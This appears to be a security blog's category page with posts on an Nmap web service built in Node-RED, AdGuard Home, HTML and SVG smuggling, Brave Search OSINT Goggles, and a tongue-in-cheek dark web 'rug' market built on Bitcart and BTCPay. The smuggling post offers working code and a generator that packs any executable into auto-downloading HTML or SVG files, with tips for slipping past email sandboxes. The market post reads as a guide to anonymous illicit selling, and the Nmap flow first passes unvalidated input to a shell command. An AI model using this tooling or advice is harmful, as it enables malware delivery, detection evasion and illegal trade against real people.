Category: Blog

Blogpost

  • Node-RED, building Nmap as a Service

    Node-RED, building Nmap as a Service

    Introduction

    In the realm of cybersecurity, automation is not just a convenience but a necessity. Having a tool that can effortlessly construct endpoints and interconnect various security tools can revolutionize your workflow. Today, I’m excited to introduce you to Node-RED, a powerhouse for such tasks.

    This is part of a series of hacking tools automated with Node-RED.

    Setup

    While diving into the intricacies of setting up a Kali VM with Node-RED is beyond the scope of this blog post, I’ll offer some guidance to get you started.

    Base OS

    To begin, you’ll need a solid foundation, which is where Kali Linux comes into play. Whether you opt for a virtual machine setup or use it as the primary operating system for your Raspberry Pi, the choice is yours.

    Running Node-RED

    Once you’ve got Kali Linux up and running, the next step is to install Node-RED directly onto your machine, NOT in a Docker container, since you will need root access to the host system. Follow the installation guide provided by the Node-RED team.

    To ensure seamless operation, I highly recommend configuring Node-RED to start automatically at boot. One effective method to achieve this is by utilizing PM2.

    By following these steps, you’ll have Node-RED set up and ready to streamline your cybersecurity automation tasks.

    Nmap as a Service

    In this section, we’ll create a web service that executes Nmap scans, accessible via a URL like so: http://10.10.0.11:8080/api/v1/nmap?target=exploit.to (Note: Your IP, port, and target will differ).
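
    For a quick sanity check once the flow is built, you can hit the endpoint with curl (your IP, port, and target will differ, just like the URL above):

    Bash
    curl "http://10.10.0.11:8080/api/v1/nmap?target=exploit.to"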

    Building the Flow

    To construct this service, we’ll need to assemble the following nodes:

    • HTTP In
    • Function
    • Exec
    • Template
    • HTTP Response

    That’s all it takes.

    You can define any path you prefer for the HTTP In node. In my setup, it’s /api/v1/nmap.

    The function node contains the following JavaScript code:

    JavaScript
    // fixed scan options; the target comes from the ?target= query parameter
    msg.scan_options = "-sS -Pn -T3";
    msg.scan_target = msg.payload.target;
    
    // the Exec node will append this payload to the nmap command
    msg.payload = msg.scan_options + " " + msg.scan_target;
    return msg;

    It’s worth noting that this scan needs to run as the root user due to the -sS flag (learn more here). The msg.payload.target parameter holds the ?target= value. In production it’s crucial to filter and validate input (e.g., restrict it to a domain or IP), but for local testing this suffices.

    The Exec node is straightforward:

    It simply executes Nmap and appends the msg.payload from the previous function node. So, in this example, it results in:

    Bash
    nmap -sS -Pn -T3 exploit.to

    The Template node formats the result for web display using Mustache syntax:

    <pre>
    {{payload}}
    </pre>

    Finally, the HTTP Response node sends the raw Nmap output back to the browser. It’s important to note that this setup isn’t suitable for extensive Nmap scans that take a while, as the browser may timeout while waiting for the response to load.

    You now have a basic Nmap as a Service.

    TODO

    You can go anywhere from here, but I would suggest:

    • add validation to the endpoint
    • add features to supply custom nmap flags
    • stream results to the browser via websocket
    • save output to a database or file and poll another endpoint to check if done
    • format output for the web (either greppable nmap or XML)
    • ChatOps (Discord, Telegram bot)

    Edit 1:

    I ended up adding validation for domain and IPv4. I also modified the target variable: it is now msg.target instead of msg.payload.target.

    JavaScript
    function validateDomain(domain) {
      var domainRegex = /^(?!:\/\/)([a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}$/;
      return domainRegex.test(domain);
    }
    
    function validateIPv4(ipv4) {
      var ipv4Regex =
        /^(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$/;
      return ipv4Regex.test(ipv4);
    }
    
    if (validateDomain(msg.payload.target) || validateIPv4(msg.payload.target)) {
      msg.passed = true;
      msg.target = msg.payload.target;
      return msg;
    }
    
    msg.passed = false;
    return msg;
    

    The flow now looks like this and checks msg.passed. If it is false, it returns an HTTP 400 Bad Request; otherwise it starts the Nmap scan.
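
    For reference, here is a minimal sketch of that branching as a single Function node with two outputs; the exact wiring is my assumption (output 1 to the Exec node, output 2 to an HTTP Response node), not the only way to build it:

    JavaScript
    if (msg.passed) {
      return [msg, null]; // output 1: continue to the Exec node
    }
    msg.statusCode = 400; // the HTTP Response node reads msg.statusCode
    msg.payload = "Bad Request";
    return [null, msg]; // output 2: answer immediately with 400 Bad Request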

  • AdGuard Home for security and blocking ads

    AdGuard Home for security and blocking ads

    Introduction

    In today’s digital age, the internet is saturated with advertisements and trackers, leading to slower browsing speeds and potential security threats. To combat these issues, leveraging AdGuard Home as a central ad blocker provides several key benefits, such as improved security and faster internet speeds. While browser plugins like “uBlock Origin” offer protection for individual devices within specific browsers, they fall short in safeguarding all devices, particularly those without browser support, such as IoT devices.

    Enhanced Security

    AdGuard Home blocks intrusive ads and potentially harmful websites before they even reach your devices. By filtering out malicious content, AdGuard Home significantly reduces the risk of malware infections and phishing attacks, safeguarding your personal information and sensitive data.

    Protecting Privacy

    Ads often come bundled with tracking scripts that monitor your online behavior, compromising your privacy. With AdGuard Home, you can prevent these trackers from collecting your data, preserving your anonymity and preventing targeted advertising based on your browsing habits.

    Faster Internet Speeds

    Advertisements consume valuable bandwidth and resources, leading to slower loading times and sluggish internet performance. By eliminating ads and unnecessary tracking requests, AdGuard Home helps optimize your network’s efficiency, resulting in faster page loading speeds and smoother browsing experiences.

    Open-Source and Transparent

    AdGuard Home is open-source software, meaning its source code is freely available for scrutiny and verification by the community. This transparency fosters trust and ensures that the software operates with integrity, free from hidden agendas or backdoors.

    Hosting AdGuard Home

    Now that you understand why you would want a central ad blocker in your home network, let’s get started with setting it up.

    First you need to decide if you want to host locally or in the cloud.

    Hosting locally:

    Benefits:

    • easier setup
    • more secure
    • private

    Drawbacks:

    • need a server

    Cloud hosting:

    Benefits:

    • no local server
    • better uptime

    Drawbacks:

    • more setup required for the same privacy and security

    Since DNS is not encrypted, unlike HTTPS for example, the cloud provider will most likely be able to see your DNS queries. You would need to use DNS-over-TLS or DNS-over-HTTPS. In a home network it is usually okay to use regular DNS, because AdGuard Home itself uses DNS-over-TLS/HTTPS resolvers to get the final address. An example of Cloudflare’s resolvers:

    https://dns.cloudflare.com/dns-query
    tls://1dot1dot1dot1.cloudflare-dns.com
    https://security.cloudflare-dns.com/dns-query
    tls://security.cloudflare-dns.com

    The regular (unencrypted) DNS server would be 1.1.1.1.

    Local Setup

    Depending on your setup, you might already have a server, Home Assistant, a pfSense firewall, or nothing at all. I am going to assume you have none of the above. So first of all you will need to repurpose an old PC or something like a Raspberry Pi (which I highly recommend; I own 7).

    I have personally run AdGuard Home in a reasonably sized home network on a Raspberry Pi Zero W. I recommend a bigger one, but if you’re on a really tight budget, that is probably your best bet.

    Once you have a machine running a Linux distribution of your choice, you can install AdGuard Home either in a container or directly.

    AdGuard already has pretty good documentation, which you can find here; I will briefly show you the two options:

    Docker

    First you need to install Docker. Once that is done, all that is left to do is run:

    docker run --name adguardhome \
        --restart unless-stopped \
        -v ./work:/opt/adguardhome/work \
        -v ./conf:/opt/adguardhome/conf \
        -p 53:53/tcp -p 53:53/udp \
        -p 67:67/udp -p 68:68/udp \
        -p 80:80/tcp -p 443:443/tcp -p 443:443/udp -p 3000:3000/tcp \
        -p 853:853/tcp \
        -p 784:784/udp -p 853:853/udp -p 8853:8853/udp \
        -p 5443:5443/tcp -p 5443:5443/udp \
        -d adguard/adguardhome

    And that is it. Now you can go to http://[YOUR-IP]:3000 and follow the setup steps.

    Direct

    Installing directly is just as simple:

    curl -s -S -L https://raw.githubusercontent.com/AdguardTeam/AdGuardHome/master/scripts/install.sh | sh -s -- -v

    That is it. You might have to copy the start command which will be shown in your terminal before you can set up your AdGuard in the browser.
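
    Whichever route you took, you can verify that AdGuard Home answers DNS queries with a quick dig (the IP is a placeholder for your machine’s address):

    Bash
    dig @192.168.1.2 example.com +short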

    Web UI

    The setup steps for AdGuard in the Web UI are self-explanatory, so I will not go into detail here. You are basically good to go. I recommend two things:

    Go to Filters > DNS blocklists, then click on “Add blocklist” and select every Security list. I have also enabled all the “General” blocklists and had no trouble.

    Go to Settings > DNS settings. I have the following upstream DNS servers:

    quic://dns.adguard-dns.com
    # SWITCH
    https://dns.switch.ch/dns-query
    tls://dns.switch.ch
    # quad9
    tls://dns.quad9.net
    # cloudflare
    https://dns.cloudflare.com/dns-query
    tls://1dot1dot1dot1.cloudflare-dns.com
    https://security.cloudflare-dns.com/dns-query
    tls://security.cloudflare-dns.com

    Router Configuration

    I think most readers will have a Fritz!Box, so this is what I will show here. The setup is probably very similar on your router; you basically just have to edit the DNS server settings.

    Fritz!Box

    It is no mistake that I hid my DNS server IP; scroll to the end to find out why. 9.9.9.9 is the Quad9 DNS server, which I use in case my AdGuard goes down; otherwise I would not be able to browse the web.

    Bonus

    You are welcome to use my public AdGuard Home instance at 130.61.74.147; just enter it into your router. Please be advised that I will be able to see your DNS logs, which means I would know what you do on the internet… I do not care, to be honest, so you are free to make your own choice here.

  • Unveiling HTML and SVG Smuggling

    Unveiling HTML and SVG Smuggling

    Disclaimer:

    The information provided on this blog is for educational purposes only. The use of hacking tools discussed here is at your own risk.

    For the full disclaimer, please click here.

    Introduction

    Welcome to the world of cybersecurity, where adversaries are always one step ahead, cooking up new ways to slip past our defenses. One technique that’s been causing quite a stir among hackers is HTML and SVG smuggling. It’s like hiding a wolf in sheep’s clothing—using innocent-looking files to sneak in malicious payloads without raising any alarms.

    Understanding the Technique

    HTML and SVG smuggling is all about exploiting the blind trust we place in web content. We see HTML and SVG files as harmless buddies, used for building web pages and creating graphics. But little do we know, cybercriminals are using them as Trojan horses, hiding their nasty surprises inside these seemingly friendly files.

    How It Works

    So, how does this digital sleight of hand work? Well, it’s all about embedding malicious scripts or payloads into HTML or SVG files. Once these files are dressed up and ready to go, they’re hosted on legitimate websites or sent through seemingly harmless channels like email attachments. And just like that, attackers slip past our defenses, like ninjas in the night.

    Evading Perimeter Protections

    Forget about traditional attack methods that rely on obvious malware signatures or executable files. HTML and SVG smuggling flies under the radar of many perimeter defenses. By camouflaging their malicious payloads within innocent-looking web content, attackers can stroll right past firewalls, intrusion detection systems (IDS), and other security guards without breaking a sweat.

    Implications for Security

    The implications of HTML and SVG smuggling are serious business. It’s a wake-up call for organizations to beef up their security game with a multi-layered approach. But it’s not just about installing fancy software—it’s also about educating users and keeping them on their toes. With hackers getting sneakier by the day, we need to stay one step ahead to keep our digital fortresses secure.

    The Battle Continues

    In the ever-evolving world of cybersecurity, HTML and SVG smuggling are the new kids on the block, posing a serious challenge for defenders. But fear not, fellow warriors! By staying informed, adapting our defenses, and collaborating with our peers, we can turn the tide against these digital infiltrators. So let’s roll up our sleeves and get ready to face whatever challenges come our way.

    Enough theory and talk, let’s get dirty! 🏴‍☠️

    Being malicious

    At this point I would like to remind you of my Disclaimer, again 😁.

    I prepared a demo using a simple Cloudflare Pages website; the payload being downloaded is an EICAR test file.

    Here is the Page: HTML Smuggling Demo <- Clicking this will download an EICAR test file onto your computer. If you read the Wikipedia article above, you understand that this could trigger your antivirus (it should).

    Here is the code (I cut part of the payload out, or it would get too big):

    <body>
      <script>
        // decode the base64 string back into the payload's raw bytes
        function base64ToArrayBuffer(base64) {
          var binary_string = window.atob(base64);
          var len = binary_string.length;
    
          var bytes = new Uint8Array(len);
          for (var i = 0; i < len; i++) {
            bytes[i] = binary_string.charCodeAt(i);
          }
          return bytes.buffer;
        }
    
        // the smuggled file travels inside the page as a base64 string
        var file = "BASE64_ENCODED_PAYLOAD";
        var data = base64ToArrayBuffer(file);
        var blob = new Blob([data], { type: "octet/stream" });
        var fileName = "eicar.com";
    
        if (window.navigator.msSaveOrOpenBlob) {
          // legacy IE/Edge download path
          window.navigator.msSaveOrOpenBlob(blob, fileName);
        } else {
          // build an invisible link to a blob: URL and auto-click it
          var a = document.createElement("a");
          console.log(a);
          document.body.appendChild(a);
          a.style = "display: none";
          var url = window.URL.createObjectURL(blob);
          a.href = url;
          a.download = fileName;
          a.click();
          window.URL.revokeObjectURL(url);
        }
      </script>
    </body>

    This will create an auto-clicked link on the page, which looks like this:

    <a href="blob:https://2cdcc148.fck-vp.pages.dev/dbadccf2-acf1-41be-b9b7-7db8e7e6b880" download="eicar.com" style="display: none;"></a>

    This is HTML smuggling at its most basic. Just take any file, encode it in base64, and insert the result into var file = "BASE64_ENCODED_PAYLOAD";. Easy peasy, right? But beware, savvy sandbox-based systems can sniff out these tricks. To outsmart them, try a little sleight of hand. Instead of attaching the encoded HTML directly to an email, start with a harmless-looking link. Then, after a delay, slip in the “payloaded” HTML. It’s like sneaking past security with a disguise. The delay buys you time for a thorough scan, presenting a clean, innocent page to initial scanners.

    By playing it smart, you up your chances of slipping past detection and hitting your target undetected. But hey, keep in mind, not every tactic works every time. Staying sharp and keeping up with security measures is key to staying one step ahead of potential threats.

    Advanced Smuggling

    If you’re an analyst reading this, you’re probably yawning at the simplicity of my example. I mean, come on, spotting that massive base64 string in the HTML is child’s play for you, right? But fear not, there are some nifty tweaks to spice up this technique. For instance, ever thought of injecting your code into an SVG?

    <svg
      xmlns="http://www.w3.org/2000/svg"
      xmlns:xlink="http://www.w3.org/1999/xlink"
      version="1.0"
      width="100"
      height="100"
    >
      <circle cx="50" cy="50" r="40" stroke="black" stroke-width="3" fill="red" />
      <script>
        <![CDATA[document.addEventListener("DOMContentLoaded",function(){function base64ToArrayBuffer(base64){var binary_string=atob(base64);var len=binary_string.length;var bytes=new Uint8Array(len);for(var i=0;i<len;i++){bytes[i]=binary_string.charCodeAt(i);}return bytes.buffer;}var file='BASE64_PAYLOAD_HERE';var data=base64ToArrayBuffer(file);var blob=new Blob([data],{type:'octet/stream'});var fileName='karl.webp';var a=document.createElementNS('http://www.w3.org/1999/xhtml','a');document.documentElement.appendChild(a);a.setAttribute('style','display:none');var url=window.URL.createObjectURL(blob);a.href=url;a.download=fileName;a.click();window.URL.revokeObjectURL(url);});]]>
      </script>
    </svg>

    You can stash the SVG in a CDN and have it loaded at the beginning of your page. It’s a tad more sophisticated, right? Just a tad.
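
    One detail to keep in mind: browsers only run scripts inside an SVG when the file is loaded as its own document, for example via an <object> or <iframe>, not through a plain <img> tag. A minimal embed (the CDN URL is a placeholder) could look like this:

    <object data="https://cdn.example.com/smuggle-logo.svg" type="image/svg+xml"></object>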

    Now, I can’t take credit for this genius idea. Nope, the props go to Surajpkhetani, whose tool also gave me the idea for this post. I decided to put my own spin on it and rewrote his AutoSmuggle tool in JavaScript. Why? Well, just because I can. I mean, I could have gone with Python or Go… and who knows, maybe I will someday. But for now, here’s the JavaScript code:

    const fs = require("fs");
    
    function base64Encode(plainText) {
      return Buffer.from(plainText).toString("base64");
    }
    
    function svgSmuggle(b64String, filename) {
      const obfuscatedB64 = b64String;
      const svgBody = `<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" width="100" height="100"><circle cx="50" cy="50" r="40" stroke="black" stroke-width="3" fill="red"/><script><![CDATA[document.addEventListener("DOMContentLoaded",function(){function base64ToArrayBuffer(base64){var binary_string=atob(base64);var len=binary_string.length;var bytes=new Uint8Array(len);for(var i=0;i<len;i++){bytes[i]=binary_string.charCodeAt(i);}return bytes.buffer;}var file='${obfuscatedB64}';var data=base64ToArrayBuffer(file);var blob=new Blob([data],{type:'octet/stream'});var fileName='${filename}';var a=document.createElementNS('http://www.w3.org/1999/xhtml','a');document.documentElement.appendChild(a);a.setAttribute('style','display:none');var url=window.URL.createObjectURL(blob);a.href=url;a.download=fileName;a.click();window.URL.revokeObjectURL(url);});]]></script></svg>`;
      const [file2, file3] = filename.split(".");
      fs.writeFileSync(`smuggle-${file2}.svg`, svgBody);
    }
    
    function htmlSmuggle(b64String, filename) {
      const obfuscatedB64 = b64String;
      const htmlBody = `<html><body><script>function base64ToArrayBuffer(base64){var binary_string=atob(base64);var len=binary_string.length;var bytes=new Uint8Array(len);for(var i=0;i<len;i++){bytes[i]=binary_string.charCodeAt(i);}return bytes.buffer;}var file='${obfuscatedB64}';var data=base64ToArrayBuffer(file);var blob=new Blob([data],{type:'octet/stream'});var fileName='${filename}';if(window.navigator.msSaveOrOpenBlob){window.navigator.msSaveOrOpenBlob(blob,fileName);}else{var a=document.createElement('a');console.log(a);document.body.appendChild(a);a.style='display:none';var url=window.URL.createObjectURL(blob);a.href=url;a.download=fileName;a.click();window.URL.revokeObjectURL(url);}</script></body></html>`;
      const [file2, file3] = filename.split(".");
      fs.writeFileSync(`smuggle-${file2}.html`, htmlBody);
    }
    
    function printError(error) {
      console.error("\x1b[31m%s\x1b[0m", error);
    }
    
    function main(args) {
      try {
        let inputFile, outputType;
        for (let i = 0; i < args.length; i++) {
          if (args[i] === "-i" && args[i + 1]) {
            inputFile = args[i + 1];
            i++;
          } else if (args[i] === "-o" && args[i + 1]) {
            outputType = args[i + 1];
            i++;
          }
        }
    
        if (!inputFile || !outputType) {
          printError(
            "[-] Invalid arguments. Usage: node script.js -i inputFilePath -o outputType(svg/html)"
          );
          return;
        }
    
        console.log("[+] Reading Data");
        const streamData = fs.readFileSync(inputFile);
        const b64Data = base64Encode(streamData);
        console.log("[+] Converting to Base64");
    
        console.log("[*] Smuggling in", outputType.toUpperCase());
        if (outputType === "html") {
          htmlSmuggle(b64Data, inputFile);
          console.log("[+] File Written to Current Directory...");
        } else if (outputType === "svg") {
          svgSmuggle(b64Data, inputFile);
          console.log("[+] File Written to Current Directory...");
        } else {
          printError(
            "[-] Invalid output type. Only 'svg' and 'html' are supported."
          );
        }
      } catch (ex) {
        printError(ex.message);
      }
    }
    
    main(process.argv.slice(2));

    Essentially it generates HTML pages or SVG “images” for you simply by running:

    node autosmuggler.cjs -i virus.exe -o html

    I’ve dubbed it HTMLSmuggler. Swing by my GitHub to grab the code and take a peek. But hold onto your hats, because I’ve got big plans for this little tool.

    In the pipeline, I’m thinking of ramping up the stealth factor. Picture this: slicing and dicing large files into bite-sized chunks like JSON, then sneakily loading them in once the page is up and running. Oh, and let’s not forget about auto-deleting payloads and throwing in some IndexedDB wizardry to really throw off those nosy analysts.

    I’ve got this wild notion of scattering the payload far and wide—some bits in HTML, others in JS, a few stashed away in local storage, maybe even tossing a few crumbs into a remote CDN or even the URL itself.

    The goal? To make this baby as slippery as an eel and as light as a feather. Because let’s face it, if you’re deploying a dropper, you want it to fly under the radar—not lumber around like a clumsy elephant.

    The End

    Whether you’re a newbie to HTML smuggling or a seasoned pro, I hope this journey has shed some light on this sneaky technique and sparked a few ideas along the way.

    Thanks for tagging along on this adventure through my musings and creations. Until next time, keep those creative juices flowing and stay curious! 🫡

  • Using Brave Search Goggles for Recon

    Using Brave Search Goggles for Recon

    Introduction

    The world’s most potent OSINT (Open Source Intelligence) tools are search engines. They collect, index, and aggregate all the freely available information on the internet, essentially encapsulating the world’s knowledge. Nowadays, the ability to enter a topic in a search bar and receive results within milliseconds is often taken for granted. Personally, I’ve developed a profound appreciation for this technology by constructing my own search engines from scratch using Golang. But let’s dive into our topic – have you ever tried Googling your own name?

    Today, I want to shine a light on Brave Search (Brave Search docs). In 2022, Brave introduced a remarkable yet underappreciated feature known as Goggles. Described on the Brave Goggles website as follows:

    Goggles allow you to choose, alter, or extend the ranking of Brave Search results. Goggles are openly developed by the community of Brave Search users.

    Here’s a straightforward example:

    $boost=1,site=facebook.com

    This essentially boosts search results found on the facebook.com domain, elevating them higher in the results. The syntax is straightforward and limited; you can find an overview here.

    Pattern Matching:

    • Plain-text pattern matching in URLs: /this/is/a/pattern
    • Globbing capabilities using ’*’ to match zero, one, or more characters: /this/is/*/pattern
    • Use of ’^’ to match URL delimiters or end-of-URL: /this/is/a/pattern^

    Anchoring:

    • Use of ’|’ character for prefix or suffix matches in URLs.
      • Prefix: |https://en.
      • Suffix: /some/path.html|

    Options:

    • ‘site=’ option to limit instructions to specific websites based on their domain: $site=brave.com

    Actions:

    • ‘boost’: Boost the ranking of matched results: /r/brave_browser/$boost or $boost=4,site=test.de
    • ‘downrank’: Downrank the ranking of matched results: /r/google/$downrank
    • ‘discard’: Completely discard matched results: /this/is/spam/$discard

    Strength of Actions:

    • Adjust the strength of boosting or downranking actions (limited to a maximum value of 10): /r/brave_browser/$boost=3

    Combining Instructions:

    • Combine multiple instructions to express complex reranking functions with a comma ”,”: /hacking/$boost=3,site=github.com

    Finding Goggles

    Now that you have a basic idea of how to construct Goggles, you can find prebuilt ones here.

    A search for “osint” reveals my very own creation, the world’s first public 🎉 OSINT Goggle.

    When building your own Goggle, it needs to be hosted on GitHub or Gitlab. I host mine here on GitHub.

    DACH OSINT Goggle

    Here’s my code:

    ! name: DACH OSINT
    ! description: OSINT Goggle for the DACH (Germany, Austria, and Switzerland) Region. Find out more on my blog [exploit.to](https://exploit.to/)
    ! public: true
    ! author: StasonJatham
    ! avatar: #ec4899
    
    ! German Platforms
    $boost=4,site=telefonbuch.de
    $boost=4,site=dastelefonbuch.de
    $boost=4,site=northdata.de
    $boost=4,site=unternehmensregister.de
    $boost=4,site=firmen.wko.at
    
    ! Small boost for social media
    $boost=1,site=facebook.com
    $boost=1,site=twitter.com
    $boost=1,site=linkedin.com
    $boost=1,site=xing.com
    
    ! Online reviews
    $boost=2,site=tripadvisor.de
    $boost=2,site=tripadvisor.at
    $boost=2,site=tripadvisor.ch
    
    ! Personal/Business contact information, path boost
    /kontakt*$boost=3
    /datenschutz*$boost=3
    /impressum*$boost=3
    
    ! General boost, words included in pages
    *mail*$boost=1,site=de
    *mail*$boost=1,site=at
    *mail*$boost=1,site=ch
    *adresse*$boost=1,site=de
    *adresse*$boost=1,site=at
    *adresse*$boost=1,site=ch
    *verein*$boost=1
    
    ! Personal email
    *gmx*$boost=1
    *web*$boost=1
    *t-online*$boost=1
    *gmail*$boost=1
    *yahoo*$boost=1
    *Postadresse*$boost=1
    

    I believe it’s self-explanatory; the aim is to prioritize results that commonly contain personal information. However, it’s still a work in progress, and I plan to add more filters to these rules.

    Rule Development

    Rant Alert: Developing these rules can be quite frustrating. You have to push your rule to GitHub, then enter the URL in the Goggle upload and hope that you don’t encounter any cached results. The error messages received are often useless; most of the time, you just get something like “cannot compile.” In the future, I earnestly hope for an online editor or VSCode support. If the frustration persists, I might consider building it myself. Despite these challenges, writing these rules is generally straightforward.

    Future

    I hope the Brave team prioritizes this feature, and more people embrace it. They’ve hinted at more advanced filter rules akin to those found on Google, such as “intitle,” which, in my opinion, would make this the most powerful search engine on the planet.

    I also intend to focus on malware research, aiming to refine searches to uncover information about whether a particular file, domain, or email is known to be malicious.

    Please take a look at my Goggle and try it out for yourself. Provide feedback, spread the word, and create your own Goggles to give this feature the love it deserves.


    The title image is by Brave Software, Inc. on Brave Search.

  • How to sell rugs online (fast) – hosting your own Dark web market

    How to sell rugs online (fast) – hosting your own Dark web market

    Disclaimer:

    The information provided on this blog is for educational purposes only. The use of hacking tools discussed here is at your own risk.

    For the full disclaimer, please click here.

    Welcome to the Dark Web Rug Emporium!

    So, you’ve made the bold decision to take your rug-selling business to the mysterious realms of the internet’s underworld? Congratulations on joining the league of adventurers! But before you take the plunge into this clandestine universe, let’s shed some light on what exactly the dark web is.

    Unveiling the Dark Web

    Picture the dark web as the shady back alleys of cyberspace, lurking beyond the reach of traditional search engines like Google or Bing. To access this hidden realm, you’ll need specialized software such as Tor (The Onion Router). Tor works like a digital disguise, masking your online activities by bouncing them through a global network of servers, rendering them virtually untraceable. Think of it as donning a digital ski mask while you explore.

    The Secrets Within

    Within this shadowy domain lies a treasure trove of hidden services known as onion sites. These sites sport the “.onion” suffix and are exclusively accessible via Tor. They operate on encrypted networks, providing users with a veil of anonymity for their online dealings and conversations. Yes, your potential rug emporium can thrive in this covert corner of the internet.

    Setting Up Shop

    But don’t think setting up shop in the dark web is as simple as putting up a “For Sale” sign. It demands a certain level of technical expertise and a deep understanding of anonymity protocols. But fret not, brave entrepreneur, for we’re about to embark on a journey to illuminate the path to rug-selling triumph in the internet’s shadows. So, buckle up, adjust your night vision goggles, and let’s dive in.

    For valuable insights into navigating the dark web as a rug salesman, I highly recommend checking out this enlightening talk: DEF CON 30 – Sam Bent – Tor – Darknet Opsec By a Veteran Darknet Vendor

    Establishing Your Den

    Now that we’ve suited up with our cybernetic fedoras and armed ourselves with the necessary tools, it’s time to establish our base of operations. Think of it as laying the foundation for your virtual rug emporium.

    Payment Processing: Decrypting the Coinage

    In the dark web marketplace, cash is so last millennium. Cryptocurrencies reign supreme, offering a level of anonymity and decentralization that traditional fiat currencies can only dream of. To cater to our discerning clientele, we’ll be accepting payments in Bitcoin and Monero, the preferred currencies of choice for denizens of the deep web.

    But how do we integrate these cryptocurrencies into our rug-selling empire? Fear not, for the internet offers solutions to meet our clandestine needs. Here are a few notable options to consider:

    1. Bitcart: A sleek and user-friendly payment processor. With its robust features and seamless integration, Bitcart ensures a smooth transaction experience for both buyers and sellers. Check out their website for a complete list of features.
    2. BTCPay Server: For the more tech-savvy rug merchants among us, BTCPay Server offers unparalleled flexibility and control over our payment infrastructure. This open-source platform allows us to self-host our payment gateway, giving us complete autonomy over our financial transactions. Check out their website for a complete list of features.

    Now that we’ve selected our payment processors, it’s time to lay the groundwork for our virtual storefront. We’ll be starting with a fresh Debian 12 LXC container, providing us with a clean slate to build upon. Let’s roll up our sleeves and prepare our base system for the dark web bazaar:

    Bash
    sudo su
    apt update && apt upgrade -y
    apt install git curl sudo -y
    curl -fsSL https://get.docker.com -o get-docker.sh
    sh get-docker.sh
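
    If you want to confirm Docker came up properly before continuing, a quick smoke test (optional, purely a sanity check):

    Bash
    docker run --rm hello-world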
    

    With our base system primed and ready, we’re one step closer to realizing our rug-selling dreams in the shadowy corners of the internet. But remember, dear reader, the journey ahead is fraught with peril and intrigue. So, steel yourself, for the dark web awaits.

    Bitcart

    Bitcart store dashboard

    Effortless Deployment

    Deploying Bitcart is a breeze with our simplified steps:

    Replace YOUR_DOMAIN_OR_IP with your domain/IP

    Bash
    sudo su -
    apt-get update && apt-get install -y git
    if [ -d "bitcart-docker" ]; then echo "Existing bitcart-docker folder found, pulling instead of cloning."; (cd bitcart-docker && git pull); fi
    if [ ! -d "bitcart-docker" ]; then echo "Cloning bitcart-docker"; git clone https://github.com/bitcart/bitcart-docker bitcart-docker; fi
    export BITCART_HOST=YOUR_DOMAIN_OR_IP
    export BITCART_REVERSEPROXY=nginx
    export BITCART_CRYPTOS=btc,xmr
    export BITCART_ADDITIONAL_COMPONENTS=tor
    cd bitcart-docker
    ./setup.sh
    

    This will add Tor support and make Monero (XMR) and Bitcoin (BTC) usable.

    After setup, navigate to http://DOMAIN_OR_IP/admin/register to register your first user, who will be designated as your admin.

    Real talk about Bitcart

    Using Bitcart to set up your online store is straightforward, but there’s a lot to learn to make the most of it. Check out their documentation to understand all the options and features.

    Running an online store may seem easy, but it’s actually quite complex. Even though Bitcart makes it easier, there are still challenges, especially if you want to use it with Tor. Tor users might have trouble loading certain parts of your store, which could reveal their identity.

    If you’re comfortable with WordPress, you might want to try Bitcart’s WooCommerce integration. But if you’re serious about building a dark web store, a custom solution is best. Bitcart offers a way to do this, which you can learn about here. You can use Python and Django to build it, which is great because Django lets you make pages with less JavaScript, which is important for user privacy.

    So, while Bitcart is a good starting point, building your own store tailored for the dark web ensures you have more control and can give your users a safer experience. With the right tools and approach, you can create a successful online store in the hidden corners of the internet.

    Harnessing Bitcart’s Capabilities

    If you’re contemplating Bitcart, delving into their documentation could revolutionize your approach. Crafting a tailored solution using their API opens up a plethora of opportunities.

    To bolster security, consider limiting Bitcart’s accessibility to your local machine, shielding it from prying eyes. Meanwhile, powering your marketplace storefront with platforms like PHP (Laravel), Django, or even Next.js provides scalability and flexibility.

    This strategy seamlessly integrates Bitcart’s robust backend features with the versatility of these frameworks, ensuring a smooth and secure shopping experience for your users.

    The reasoning behind this suggestion lies in the solid community support and reliability of battle-tested technologies. Platforms such as PHP (Laravel), Django, and Next.js boast extensive communities and proven track records—essential qualities in the dark web landscape.

    In the clandestine corners of cyberspace, resilience reigns supreme. A single vulnerability in your storefront could lead to catastrophe. By aligning with established frameworks, you gain access to a wealth of expertise and resources, bolstering your defenses against potential threats.

    Ultimately, adopting these trusted technologies isn’t merely a matter of preference—it’s a strategic necessity for safeguarding your online presence in the murky depths of the internet.

    BTCPayServer: Unveiling a Sophisticated Setup

    Setting up BTCPayServer demands a bit more effort due to its slightly complex documentation, especially when deploying on a local network. However, integrating Monero turned out to be surprisingly straightforward. Here’s an excellent guide on that: Accepting Monero via BTCPay Server.

    I’ve made slight modifications to the deployment script from the official documentation:

    Bash
    mkdir BTCPayServer
    cd BTCPayServer
    git clone https://github.com/btcpayserver/btcpayserver-docker
    cd btcpayserver-docker
    export BTCPAY_HOST="btcpay.local"
    export REVERSEPROXY_DEFAULT_HOST="$BTCPAY_HOST"
    export NBITCOIN_NETWORK="mainnet"
    export BTCPAYGEN_CRYPTO1="btc"
    export BTCPAYGEN_CRYPTO2="xmr"
    export BTCPAYGEN_ADDITIONAL_FRAGMENTS="opt-save-storage-xxs" # for demo
    export BTCPAYGEN_REVERSEPROXY="nginx"
    export BTCPAYGEN_LIGHTNING="clightning"
    . ./btcpay-setup.sh -i
    

    Note that this is a local setup, but it will be publicly accessible over the onion address.

    What distinguishes BTCPayServer is its sleek and modern admin interface. As someone who appreciates good design, I find its aesthetics truly appealing. Furthermore, it includes a built-in store and support for Tor, adding an extra layer of privacy.

    Customization is seamless with BTCPayServer’s highly adaptable UI. Additionally, its robust API empowers users to craft their own frontend experiences, ensuring flexibility and control.

    Their documentation provides clear and insightful examples, making development a delightful experience. Personally, as a fan of NodeJS, I found their NodeJS examples particularly helpful.

    In this demonstration, I’ll initiate a Fast Sync to expedite the process. However, in practical scenarios, exercising patience becomes crucial. Given my location in a less technologically advanced country like Germany, Fast Sync typically completes within a few hours on my 100 Mbit/s line, whereas the regular sync could span several days (see the BTC-XMR sync screenshot).

    Starting Fast Sync

    Initiating Fast Sync is straightforward. Either follow the documentation or run these commands in your BTCPayServer directory:

    Bash
